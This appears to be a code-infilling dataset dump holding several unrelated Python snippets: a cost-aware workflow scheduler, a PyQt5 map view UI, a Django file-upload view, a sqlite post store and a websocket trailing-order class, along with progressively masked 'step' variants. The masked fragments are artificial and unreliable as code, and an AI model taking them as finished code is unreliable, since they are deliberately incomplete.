math.ceil((ft - resource_start_time) /\r\n timeslot_len) + resource_start_time\r\n shared_cost = 0\r\n for interval in f_range(timeslot_start, timeslot_end + timeslot_len / 2, timeslot_len):\r\n share_in_interval = self.calculate_shared_cost_within_timeslot(interval, est, ft, resource_id, task_id)\r\n shared_cost += share_in_interval\r\n return shared_cost\r\n\r\n\r\n def calculate_eft_and_cost(self, task, resource_id, arrival_time=0):\r\n \"\"\"\r\n calculates eft and cost of a certain task on a certain resource.\r\n :param task:Definitions.Task()\r\n :param resource_id:\r\n :return:\r\n \"\"\"\r\n start_time, eft, runtime_on_resource, place_id = self.calculate_eft(task, resource_id, arrival_time=arrival_time)\r\n if task.dummy_task:\r\n return start_time, eft, runtime_on_resource, place_id, 0\r\n else:\r\n cost = self.calculate_share_cost_change(resource_id, start_time, eft, task.graph.name, True)\r\n return start_time, eft, runtime_on_resource, place_id, cost\r\n\r\n\r\n def sum_external_gaps_resource(self, r):\r\n c, s, e = self.resource_cost(r, cost_only=False)\r\n reservation = e - s\r\n timeslot = self.timeslot[r]\r\n gap = timeslot - reservation % timeslot\r\n if gap == timeslot:\r\n return 0\r\n else:\r\n return gap\r\n\r\n @property\r\n def sum_external_gaps(self):\r\n sum_gaps = 0\r\n for r in range(0, self.len):\r\n sum_gaps += self.sum_external_gaps_resource(r)\r\n return sum_gaps\r\n\r\n @property\r\n def sum_gaps(self):\r\n return self.sum_internal_gaps + self.sum_external_gaps\r\n\r\n @property\r\n def occupied_resources(self):\r\n counter = 0\r\n for i in range(self.len):\r\n if self.resource_cost(i) != 0:\r\n counter += self.price[i]\r\n return counter\r\n\r\n @property\r\n def gap_rate(self):\r\n return self.sum_gaps / self.makespan / self.occupied_resources\r\n\r\n def select_resource(self, task=Task(), test=None, arrival_time=0):\r\n eft_best = -1\r\n def something_found():\r\n return eft_best != -1\r\n\r\n if task.asap is not None:\r\n if not task.asap: # budget workflow\r\n if not test:\r\n print('', end='')\r\n # fastest affordable\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n -1, -1, -1, -1, -1, -1\r\n\r\n for r in range(0, self.len):\r\n start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)\r\n if not something_found() or \\\r\n eft < eft_best and task.sub_deadline < eft_best or \\\r\n task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and \\\r\n (eft_best > task.sub_deadline or cost_best > task.sub_budget) or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and eft < eft_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and eft == eft_best and cost < cost_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n start_time, eft, runtime_on_resource, place_id, r, cost\r\n continue\r\n if not test:\r\n print('', end='')\r\n return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best\r\n elif task.asap: # deadline workflow\r\n # cheapest before sub-deadline\r\n if not test:\r\n print('', end='')\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n -1, -1, -1, -1, -1, -1\r\n for r in range(0, self.len):\r\n start_time, eft, runtime_on_resource, place_id, cost = self.calculate_eft_and_cost(task, r, arrival_time=arrival_time)\r\n # if eft_best == -1 or eft_best > eft > task.sub_deadline or task.sub_deadline >= eft and (\r\n # cost < cost_best or eft_best > task.sub_deadline):\r\n if not something_found() or \\\r\n eft < eft_best and task.sub_deadline < eft_best or \\\r\n task.sub_budget < cost_best and eft <= task.sub_deadline and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and \\\r\n (eft_best > task.sub_deadline or cost_best > task.sub_budget) or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and cost < cost_best or \\\r\n eft <= task.sub_deadline and cost <= task.sub_budget and cost == cost_best and eft < eft_best:\r\n est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n start_time, eft, runtime_on_resource, place_id, r, cost\r\n # if cost_best == -1 or cost_best > cost > task.sub_budget or task.sub_budget >= cost and (\r\n # eft < eft_best or cost_best > task.sub_budget):\r\n # est_best, eft_best, runtime_on_resource_best, place_id_best, resource_id_best, cost_best = \\\r\n # start_time, eft, runtime_on_resource, place_id, r, cost\r\n continue\r\n if not test:\r\n print('', end='')\r\n return est_best, runtime_on_resource_best, eft_best, resource_id_best, place_id_best, cost_best\r\n else:\r\n # minimize time (as in HEFT) TODO: it doesn't return cost (as the sixth return value)\r\n return super(CostAwareResources, self).select_resource(task)\r\n\r\n def price_of_each_graph(self):\r\n graph_names = self.job_task_schedule.keys()\r\n costs = {}\r\n for name in graph_names:\r\n costs[name] = 0\r\n for r in range(self.len):\r\n for id in range(len(self.tasksOfResource[r])):\r\n name = self.tasksOfResource[r][id].task.graph.name\r\n cost = self.calculate_task_shared_cost(resource_id=r, task_id=id)\r\n costs[name] += cost\r\n return costs\r\n\r\n def get_cheapest_empty_resource(self):\r\n for r in range(self.len):\r\n if len(self.tasksOfResource[r]) == 0:\r\n return r\r\n else:\r\n return -1\r\n\r\n def schedule(self, task_schedule, place_id=-1, do_head_nodes=False):\r\n super(CostAwareResources, self).schedule(task_schedule, place_id)\r\n\r\n # head_node computations:\r\n if not do_head_nodes:\r\n return\r\n if task_schedule.task.graph.name in self.head_nodes:\r\n prev_heads = self.head_nodes[task_schedule.task.graph.name]\r\n parents_of_current_task = task_schedule.task.predecessor.keys()\r\n self.head_nodes[task_schedule.task.graph.name] = self.head_nodes[task_schedule.task.graph.name].difference(\r\n parents_of_current_task)\r\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)\r\n else:\r\n self.head_nodes[task_schedule.task.graph.name] = set()\r\n self.head_nodes[task_schedule.task.graph.name].add(task_schedule.task.id)\r\n self.sum_weight_scheduled[task_schedule.task.graph.name] = 0\r\n\r\n self.sum_weight_scheduled[task_schedule.task.graph.name] += task_schedule.task.weight\r\n\r\n def calculate_share_cost_change(self, resource_id, est=-1, eft=-1, job_id=-1, only_this_job=False):\r\n sum_w = {}\r\n for i in range(len(self.tasksOfResource[resource_id])):\r\n sch = self.tasksOfResource[resource_id][i]\r\n job = sch.task.graph.name\r\n if job not in sum_w:\r\n sum_w[job] = 0\r\n sum_w[job] += sch.EFT - sch.EST\r\n sum_w_all_old = sum(sum_w.values())\r\n prev_cost_resource = self.resource_cost(resource_id)\r\n prev_cost_job = {}\r\n for j in sum_w.keys():\r\n if sum_w_all_old == 0:\r\n prev_cost_job[j] = 0\r\n else:\r\n prev_cost_job[j] = float(prev_cost_resource) * sum_w[j] / sum_w_all_old\r\n if est == -1:\r\n return prev_cost_job\r\n\r\n new_cost_resource = self.resource_cost(resource_id, start_time=est, eft=eft)\r\n if job_id not in sum_w:\r\n sum_w[job_id] = 0\r\n sum_w[job_id] += eft - est\r\n sum_w_all_new = sum_w_all_old + eft - est\r\n\r\n new_cost_job = {}\r\n changes = {}\r\n for j in sum_w.keys():\r\n if sum_w_all_new == 0:\r\n new_cost_job[j] = 0\r\n else:\r\n new_cost_job[j] = float(new_cost_resource) * sum_w[j] / sum_w_all_new\r\n if j not in prev_cost_job:\r\n changes[j] = new_cost_job[j]\r\n else:\r\n changes[j] = new_cost_job[j] - prev_cost_job[j]\r\n if only_this_job:\r\n return changes[job_id]\r\n return changes\r\n",
"step-ids": [
22,
28,
32,
36,
40
]
}
|
[
22,
28,
32,
36,
40
] |
<|reserved_special_token_0|>
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
<|reserved_special_token_0|>
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
import sqlite3
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute(
"""CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
"""
)
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
<|reserved_special_token_1|>
__author__ = 'laispace.com'
import sqlite3
dbname = 'alloyteam.db'
def createTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS posts
(url text primary key,
title text,
date text,
authorLink text,
authorName text,
view text)
''')
conn.commit()
conn.close()
def createPosts(posts):
conn = sqlite3.connect(dbname)
c = conn.cursor()
for post in posts:
c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)
# c.executemany('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', posts)
conn.commit()
conn.close()
def readPosts():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('SELECT * FROM posts')
posts = c.fetchall()
conn.commit()
conn.close()
return posts
def dropTable():
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('DROP table IF EXISTS posts')
conn.commit()
conn.close()
|
flexible
|
{
"blob_id": "602df213c0d588404597c566001cd9c96b5034d0",
"index": 4530,
"step-1": "<mask token>\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-2": "<mask token>\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-3": "__author__ = 'laispace.com'\n<mask token>\ndbname = 'alloyteam.db'\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-4": "__author__ = 'laispace.com'\nimport sqlite3\ndbname = 'alloyteam.db'\n\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n \"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n conn.commit()\n conn.close()\n\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-5": "__author__ = 'laispace.com'\n\nimport sqlite3\n\ndbname = 'alloyteam.db'\n\ndef createTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS posts\n (url text primary key,\n title text,\n date text,\n authorLink text,\n authorName text,\n view text)\n ''')\n conn.commit()\n conn.close()\n\ndef createPosts(posts):\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n for post in posts:\n c.execute('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', post)\n # c.executemany('INSERT OR REPLACE INTO posts VALUES (?,?,?,?,?,?)', posts)\n conn.commit()\n conn.close()\n\ndef readPosts():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('SELECT * FROM posts')\n posts = c.fetchall()\n conn.commit()\n conn.close()\n return posts\n\ndef dropTable():\n conn = sqlite3.connect(dbname)\n c = conn.cursor()\n c.execute('DROP table IF EXISTS posts')\n conn.commit()\n conn.close()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mapGraph.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MapGraphTab(object):
def setupUi(self, MapGraphTab):
MapGraphTab.setObjectName("MapGraphTab")
MapGraphTab.resize(1150, 831)
MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))
MapGraphTab.setStyleSheet("background-color: rgb(255, 96, 117);")
self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)
self.gridLayout.setObjectName("gridLayout")
self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)
self.mapView.setUrl(QtCore.QUrl("about:blank"))
self.mapView.setObjectName("mapView")
self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)
self.label = QtWidgets.QLabel(MapGraphTab)
self.label.setMinimumSize(QtCore.QSize(1050, 0))
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 2)
self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)
font = QtGui.QFont()
font.setFamily("Book Antiqua")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.extractrMapBtn.setFont(font)
self.extractrMapBtn.setStyleSheet("background-color: rgb(255, 255, 255);")
self.extractrMapBtn.setObjectName("extractrMapBtn")
self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)
self.retranslateUi(MapGraphTab)
QtCore.QMetaObject.connectSlotsByName(MapGraphTab)
def retranslateUi(self, MapGraphTab):
_translate = QtCore.QCoreApplication.translate
MapGraphTab.setWindowTitle(_translate("MapGraphTab", "Map Graph"))
self.label.setText(_translate("MapGraphTab", "Map Graph"))
self.extractrMapBtn.setText(_translate("MapGraphTab", "Extract Video"))
from PyQt5 import QtWebEngineWidgets
|
normal
|
{
"blob_id": "03a13037a9a102397c8be4d9f0f4c5e150965808",
"index": 8666,
"step-1": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\n<mask token>\n",
"step-4": "from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_MapGraphTab(object):\n\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName('MapGraphTab')\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet('background-color: rgb(255, 96, 117);')\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName('gridLayout')\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl('about:blank'))\n self.mapView.setObjectName('mapView')\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily('Book Antiqua')\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\n 'background-color: rgb(255, 255, 255);')\n self.extractrMapBtn.setObjectName('extractrMapBtn')\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate('MapGraphTab', 'Map Graph'))\n self.label.setText(_translate('MapGraphTab', 'Map Graph'))\n self.extractrMapBtn.setText(_translate('MapGraphTab', 'Extract Video'))\n\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'mapGraph.ui'\n#\n# Created by: PyQt5 UI code generator 5.9.2\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MapGraphTab(object):\n def setupUi(self, MapGraphTab):\n MapGraphTab.setObjectName(\"MapGraphTab\")\n MapGraphTab.resize(1150, 831)\n MapGraphTab.setMinimumSize(QtCore.QSize(1150, 830))\n MapGraphTab.setStyleSheet(\"background-color: rgb(255, 96, 117);\")\n self.gridLayout = QtWidgets.QGridLayout(MapGraphTab)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.mapView = QtWebEngineWidgets.QWebEngineView(MapGraphTab)\n self.mapView.setUrl(QtCore.QUrl(\"about:blank\"))\n self.mapView.setObjectName(\"mapView\")\n self.gridLayout.addWidget(self.mapView, 1, 0, 1, 2)\n self.label = QtWidgets.QLabel(MapGraphTab)\n self.label.setMinimumSize(QtCore.QSize(1050, 0))\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.gridLayout.addWidget(self.label, 0, 0, 1, 2)\n self.extractrMapBtn = QtWidgets.QPushButton(MapGraphTab)\n font = QtGui.QFont()\n font.setFamily(\"Book Antiqua\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.extractrMapBtn.setFont(font)\n self.extractrMapBtn.setStyleSheet(\"background-color: rgb(255, 255, 255);\")\n self.extractrMapBtn.setObjectName(\"extractrMapBtn\")\n self.gridLayout.addWidget(self.extractrMapBtn, 2, 0, 1, 1)\n\n self.retranslateUi(MapGraphTab)\n QtCore.QMetaObject.connectSlotsByName(MapGraphTab)\n\n def retranslateUi(self, MapGraphTab):\n _translate = QtCore.QCoreApplication.translate\n MapGraphTab.setWindowTitle(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.label.setText(_translate(\"MapGraphTab\", \"Map Graph\"))\n self.extractrMapBtn.setText(_translate(\"MapGraphTab\", \"Extract Video\"))\n\nfrom PyQt5 import QtWebEngineWidgets\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django import forms
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import time
from page.models import Submit, Assignment
class UploadFileForm(forms.ModelForm):
class Meta:
model = Submit
fields = ['email', 'student_no', 'file']
@csrf_exempt
def upload(request):
# TODO: check file size and type
frm = UploadFileForm(request.POST, request.FILES)
if not frm.is_valid():
return JsonResponse({'error': frm.errors})
submit = frm.save(commit=False)
submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')
submit.time = time.time()
submit.save()
res = JsonResponse({'success': True})
if 'application/json' not in request.META['HTTP_ACCEPT']:
# INTERNET EXPLORER!!
res['Content-Type'] = 'text/plain'
return res
|
normal
|
{
"blob_id": "dabc38db6a5c4d97e18be2edc9d4c6203e264741",
"index": 3849,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-4": "from django import forms\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nfrom page.models import Submit, Assignment\n\n\nclass UploadFileForm(forms.ModelForm):\n\n\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-5": "from django import forms\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport time\nfrom page.models import Submit, Assignment\n\n\nclass UploadFileForm(forms.ModelForm):\n class Meta:\n model = Submit\n fields = ['email', 'student_no', 'file']\n\n\n@csrf_exempt\ndef upload(request):\n # TODO: check file size and type\n frm = UploadFileForm(request.POST, request.FILES)\n if not frm.is_valid():\n return JsonResponse({'error': frm.errors})\n\n submit = frm.save(commit=False)\n submit.assignment, _ = Assignment.objects.get_or_create(name='HW3')\n submit.time = time.time()\n submit.save()\n\n res = JsonResponse({'success': True})\n if 'application/json' not in request.META['HTTP_ACCEPT']:\n # INTERNET EXPLORER!!\n res['Content-Type'] = 'text/plain'\n return res\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import decimal
import threading
import websocket
from time import sleep
from supervisor.core.utils.math import to_nearest
def find_item_by_keys(keys, table, match_data):
for item in table:
matched = True
for key in keys:
if item[key] != match_data[key]:
matched = False
if matched:
return item
class TrailingShell:
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):
self.tick_size = tick_size
self.exited = False
self.test = test
self.order = order
self.offset = offset
self.last_price = 0
self._min_price = float('inf')
self._max_price = -1
self.initial_price = float('nan')
self.tracking = False
self.ws = None
self.__reset()
if init_ws:
self.connect()
def __del__(self):
self.exit()
def exit(self):
self.exited = True
if self.ws is not None:
self.ws.close()
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def get_instrument(self, symbol):
instruments = self.data.get('instrument', None)
if instruments is None:
return None
